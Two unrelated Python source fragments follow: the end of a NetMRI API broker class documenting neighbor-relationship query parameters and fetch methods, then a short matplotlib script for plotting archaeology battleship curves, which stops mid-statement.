:param op_NeighborChangedCols: The operator to apply to the field NeighborChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborChangedCols: If op_NeighborChangedCols is specified, the field named in this input will be compared to the value in NeighborChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborChangedCols must be specified if op_NeighborChangedCols is specified.
:type val_f_NeighborChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborChangedCols: If op_NeighborChangedCols is specified, this value will be compared to the value in NeighborChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborChangedCols must be specified if op_NeighborChangedCols is specified.
:type val_c_NeighborChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborDeviceID: The operator to apply to the field NeighborDeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborDeviceID: If op_NeighborDeviceID is specified, the field named in this input will be compared to the value in NeighborDeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborDeviceID must be specified if op_NeighborDeviceID is specified.
:type val_f_NeighborDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborDeviceID: If op_NeighborDeviceID is specified, this value will be compared to the value in NeighborDeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborDeviceID must be specified if op_NeighborDeviceID is specified.
:type val_c_NeighborDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborEndTime: The operator to apply to the field NeighborEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborEndTime: If op_NeighborEndTime is specified, the field named in this input will be compared to the value in NeighborEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborEndTime must be specified if op_NeighborEndTime is specified.
:type val_f_NeighborEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborEndTime: If op_NeighborEndTime is specified, this value will be compared to the value in NeighborEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborEndTime must be specified if op_NeighborEndTime is specified.
:type val_c_NeighborEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborFirstSeenTime: The operator to apply to the field NeighborFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborFirstSeenTime: The date and time this neighbor was first seen on the network, and since which it has been continuously present. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborFirstSeenTime: If op_NeighborFirstSeenTime is specified, the field named in this input will be compared to the value in NeighborFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborFirstSeenTime must be specified if op_NeighborFirstSeenTime is specified.
:type val_f_NeighborFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborFirstSeenTime: If op_NeighborFirstSeenTime is specified, this value will be compared to the value in NeighborFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborFirstSeenTime must be specified if op_NeighborFirstSeenTime is specified.
:type val_c_NeighborFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborID: The operator to apply to the field NeighborID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborID: The internal NetMRI identifier for this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborID: If op_NeighborID is specified, the field named in this input will be compared to the value in NeighborID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborID must be specified if op_NeighborID is specified.
:type val_f_NeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborID: If op_NeighborID is specified, this value will be compared to the value in NeighborID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborID must be specified if op_NeighborID is specified.
:type val_c_NeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborIfIndex: The operator to apply to the field NeighborIfIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborIfIndex: The SNMP interface index of the destination device interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborIfIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborIfIndex: If op_NeighborIfIndex is specified, the field named in this input will be compared to the value in NeighborIfIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborIfIndex must be specified if op_NeighborIfIndex is specified.
:type val_f_NeighborIfIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborIfIndex: If op_NeighborIfIndex is specified, this value will be compared to the value in NeighborIfIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborIfIndex must be specified if op_NeighborIfIndex is specified.
:type val_c_NeighborIfIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborInterfaceID: The operator to apply to the field NeighborInterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborInterfaceID: If op_NeighborInterfaceID is specified, the field named in this input will be compared to the value in NeighborInterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborInterfaceID must be specified if op_NeighborInterfaceID is specified.
:type val_f_NeighborInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborInterfaceID: If op_NeighborInterfaceID is specified, this value will be compared to the value in NeighborInterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborInterfaceID must be specified if op_NeighborInterfaceID is specified.
:type val_c_NeighborInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborNetworkDeviceInd: The operator to apply to the field NeighborNetworkDeviceInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborNetworkDeviceInd: A flag indicating if the destination device is a network device or an end host. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborNetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborNetworkDeviceInd: If op_NeighborNetworkDeviceInd is specified, the field named in this input will be compared to the value in NeighborNetworkDeviceInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborNetworkDeviceInd must be specified if op_NeighborNetworkDeviceInd is specified.
:type val_f_NeighborNetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborNetworkDeviceInd: If op_NeighborNetworkDeviceInd is specified, this value will be compared to the value in NeighborNetworkDeviceInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborNetworkDeviceInd must be specified if op_NeighborNetworkDeviceInd is specified.
:type val_c_NeighborNetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborStartTime: The operator to apply to the field NeighborStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborStartTime: If op_NeighborStartTime is specified, the field named in this input will be compared to the value in NeighborStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborStartTime must be specified if op_NeighborStartTime is specified.
:type val_f_NeighborStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborStartTime: If op_NeighborStartTime is specified, this value will be compared to the value in NeighborStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborStartTime must be specified if op_NeighborStartTime is specified.
:type val_c_NeighborStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborTimestamp: The operator to apply to the field NeighborTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborTimestamp: If op_NeighborTimestamp is specified, the field named in this input will be compared to the value in NeighborTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborTimestamp must be specified if op_NeighborTimestamp is specified.
:type val_f_NeighborTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborTimestamp: If op_NeighborTimestamp is specified, this value will be compared to the value in NeighborTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborTimestamp must be specified if op_NeighborTimestamp is specified.
:type val_c_NeighborTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NetworkDeviceInd: The operator to apply to the field NetworkDeviceInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NetworkDeviceInd: A flag indicating if the source device is a network device or an end host. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NetworkDeviceInd: If op_NetworkDeviceInd is specified, the field named in this input will be compared to the value in NetworkDeviceInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NetworkDeviceInd must be specified if op_NetworkDeviceInd is specified.
:type val_f_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NetworkDeviceInd: If op_NetworkDeviceInd is specified, this value will be compared to the value in NetworkDeviceInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NetworkDeviceInd must be specified if op_NetworkDeviceInd is specified.
:type val_c_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OSPFRoutedInd: The operator to apply to the field OSPFRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OSPFRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an OSPF route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_OSPFRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OSPFRoutedInd: If op_OSPFRoutedInd is specified, the field named in this input will be compared to the value in OSPFRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OSPFRoutedInd must be specified if op_OSPFRoutedInd is specified.
:type val_f_OSPFRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OSPFRoutedInd: If op_OSPFRoutedInd is specified, this value will be compared to the value in OSPFRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OSPFRoutedInd must be specified if op_OSPFRoutedInd is specified.
:type val_c_OSPFRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ProtoRoutedInd: The operator to apply to the field ProtoRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ProtoRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a dynamic protocol defined route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ProtoRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ProtoRoutedInd: If op_ProtoRoutedInd is specified, the field named in this input will be compared to the value in ProtoRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ProtoRoutedInd must be specified if op_ProtoRoutedInd is specified.
:type val_f_ProtoRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ProtoRoutedInd: If op_ProtoRoutedInd is specified, this value will be compared to the value in ProtoRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ProtoRoutedInd must be specified if op_ProtoRoutedInd is specified.
:type val_c_ProtoRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RevSwitchFwdInd: The operator to apply to the field RevSwitchFwdInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RevSwitchFwdInd: A flag indicating that this neighbor relationship was derived by reversing a switch forwarding neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RevSwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RevSwitchFwdInd: If op_RevSwitchFwdInd is specified, the field named in this input will be compared to the value in RevSwitchFwdInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RevSwitchFwdInd must be specified if op_RevSwitchFwdInd is specified.
:type val_f_RevSwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RevSwitchFwdInd: If op_RevSwitchFwdInd is specified, this value will be compared to the value in RevSwitchFwdInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RevSwitchFwdInd must be specified if op_RevSwitchFwdInd is specified.
:type val_c_RevSwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SerialInd: The operator to apply to the field SerialInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SerialInd: A flag indicating that this neighbor relationship was derived using the NetMRI point-to-point neighbor detection algorithm. Despite the name this may include point-to-point relationships on interfaces other than serial interfaces. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SerialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SerialInd: If op_SerialInd is specified, the field named in this input will be compared to the value in SerialInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SerialInd must be specified if op_SerialInd is specified.
:type val_f_SerialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SerialInd: If op_SerialInd is specified, this value will be compared to the value in SerialInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SerialInd must be specified if op_SerialInd is specified.
:type val_c_SerialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StaticRoutedInd: The operator to apply to the field StaticRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StaticRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a static route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StaticRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StaticRoutedInd: If op_StaticRoutedInd is specified, the field named in this input will be compared to the value in StaticRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StaticRoutedInd must be specified if op_StaticRoutedInd is specified.
:type val_f_StaticRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StaticRoutedInd: If op_StaticRoutedInd is specified, this value will be compared to the value in StaticRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StaticRoutedInd must be specified if op_StaticRoutedInd is specified.
:type val_c_StaticRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SwitchFwdInd: The operator to apply to the field SwitchFwdInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SwitchFwdInd: A flag indicating that this neighbor relationship was derived using the NetMRI switch forwarding neighbor detection algorithm. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SwitchFwdInd: If op_SwitchFwdInd is specified, the field named in this input will be compared to the value in SwitchFwdInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SwitchFwdInd must be specified if op_SwitchFwdInd is specified.
:type val_f_SwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SwitchFwdInd: If op_SwitchFwdInd is specified, this value will be compared to the value in SwitchFwdInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SwitchFwdInd must be specified if op_SwitchFwdInd is specified.
:type val_c_SwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifIndex: The operator to apply to the field ifIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifIndex: The SNMP interface index of the source device interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifIndex: If op_ifIndex is specified, the field named in this input will be compared to the value in ifIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifIndex must be specified if op_ifIndex is specified.
:type val_f_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifIndex: If op_ifIndex is specified, this value will be compared to the value in ifIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifIndex must be specified if op_ifIndex is specified.
:type val_c_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_network_id: The operator to apply to the field network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. network_id: The Network View ID assigned to this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_network_id: If op_network_id is specified, the field named in this input will be compared to the value in network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_network_id must be specified if op_network_id is specified.
:type val_f_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_network_id: If op_network_id is specified, this value will be compared to the value in network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_network_id must be specified if op_network_id is specified.
:type val_c_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the neighbors as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of neighbor methods. The listed methods will be called on each neighbor returned and included in the output. Available methods are: network_id, device, interface, neighbor_device, neighbor_interface, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device, interface, neighbor_device, neighbor_interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` NeighborID
:param sort: The data field(s) to use for sorting the output. Default is NeighborID. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each Neighbor. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return neighbors: An array of the Neighbor objects that match the specified input criteria.
:rtype neighbors: Array of Neighbor
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def interface(self, **kwargs):
    """Fetch the source interface of this neighbor relationship.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param NeighborID: The internal NetMRI identifier for this neighbor relationship.
    :type NeighborID: Integer

    **Outputs**

    :return : The source interface in this neighbor relationship.
    :rtype : Interface
    """
    # Resolve the broker-qualified method name, then issue the API call.
    method_name = self._get_method_fullname("interface")
    return self.api_request(method_name, kwargs)
def neighbor_device(self, **kwargs):
    """Fetch the destination device of this neighbor relationship.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param NeighborID: The internal NetMRI identifier for this neighbor relationship.
    :type NeighborID: Integer

    **Outputs**

    :return : The destination device in this neighbor relationship.
    :rtype : Device
    """
    # Resolve the broker-qualified method name, then issue the API call.
    method_name = self._get_method_fullname("neighbor_device")
    return self.api_request(method_name, kwargs)
def neighbor_interface(self, **kwargs):
    """Fetch the destination interface of this neighbor relationship.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param NeighborID: The internal NetMRI identifier for this neighbor relationship.
    :type NeighborID: Integer

    **Outputs**

    :return : The destination interface in this neighbor relationship.
    :rtype : Interface
    """
    # Resolve the broker-qualified method name, then issue the API call.
    method_name = self._get_method_fullname("neighbor_interface")
    return self.api_request(method_name, kwargs)
def infradevice(self, **kwargs):
    """Fetch the source device of this neighbor relationship as an InfraDevice.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param NeighborID: The internal NetMRI identifier for this neighbor relationship.
    :type NeighborID: Integer

    **Outputs**

    :return : The source device in this neighbor relationship.
    :rtype : InfraDevice
    """
    # Resolve the broker-qualified method name, then issue the API call.
    method_name = self._get_method_fullname("infradevice")
    return self.api_request(method_name, kwargs)
def network_id(self, **kwargs):
    """Fetch the Network View ID assigned to this neighbor relationship.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param NeighborID: The internal NetMRI identifier for this neighbor relationship.
    :type NeighborID: Integer

    **Outputs**

    :return : The Network View ID assigned to this neighbor relationship.
    :rtype : Integer
    """
    # Resolve the broker-qualified method name, then issue the API call.
    method_name = self._get_method_fullname("network_id")
    return self.api_request(method_name, kwargs)
def device(self, **kwargs):
    """Fetch the source device of this neighbor relationship.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param NeighborID: The internal NetMRI identifier for this neighbor relationship.
    :type NeighborID: Integer

    **Outputs**

    :return : The source device in this neighbor relationship.
    :rtype : Device
    """
    # Resolve the broker-qualified method name, then issue the API call.
    method_name = self._get_method_fullname("device")
    return self.api_request(method_name, kwargs)
|
"""
<NAME>
License: MIT
This is a simple script for creating battleship curves
that I created for an archaeology class project.
"""
from matplotlib.pyplot import *
from numpy import *
#################### Data ######################
# Plug your values into here.
start_year = 1910
year_increment = 20
data = ["flowers", [0, 2, 5, 7, 5],
        "crosses", [3, 4, 2, 1, 0],
        "angel", [0, 2, 7, 5, 2],
        "star of david", [0, 0, 2, 2, 1]]
filename = 'example.png'
################## Formatting ##################
percentage_markers = True
border_color = 'black'
fill_color = 'black'
height = 0.9
show_y_ticks = False
preview_only = False
################################################
# `data` alternates label / count-list pairs: even slots are the
# category names, odd slots are the counts per time bucket.
labels = data[0::2]
numbers = data[1::2]
n_sets = len(numbers)
set_length = len(numbers[0])
# One time bucket per increment, starting at start_year.
years = arange(start_year, start_year + year_increment * set_length, year_increment)
year_labels = [f"{y}-{y + year_increment}" for y in years]
# Check for errors in the data: every count list must have set_length entries.
mismatched = [
    "data set #{}: {}\n".format(idx + 1, labels[idx])
    for idx in range(n_sets)
    if len(numbers[idx]) != set_length
]
bad_sets = "".join(mismatched)
assert not bad_sets, "\nwrong number of elements for the following data sets:\n{}".format(bad_sets)
def tot(n, i):
    """Return the total of column *i* summed across every data set in *n*.

    :param n: list of equal-length numeric lists (one list per data set)
    :param i: column index to sum
    :return: the column total (0 for an empty *n*)
    """
    # Builtin sum over a generator replaces the hand-rolled accumulator,
    # which also shadowed the `sum` builtin with a local variable.
    return sum(row[i] for row in n)
# Column totals across all data sets, then each set's per-column share.
total = [tot(numbers, col) for col in range(set_length)]
percentages = []
for counts in numbers:
    percentages.append([float(counts[col]) / total[col] for col in range(set_length)])
# Draw one horizontal "battleship" column per data set, bars centered on
# zero so each bar's width encodes that period's percentage.
f, axs = subplots(1, n_sets, sharex=True, sharey=True)
for i in range(n_sets):
    ax = axs[i]
    ax.set_title(labels[i])
    rects = ax.barh(arange(set_length), percentages[i],
                    height, [-x / 2.0 for x in percentages[i]],
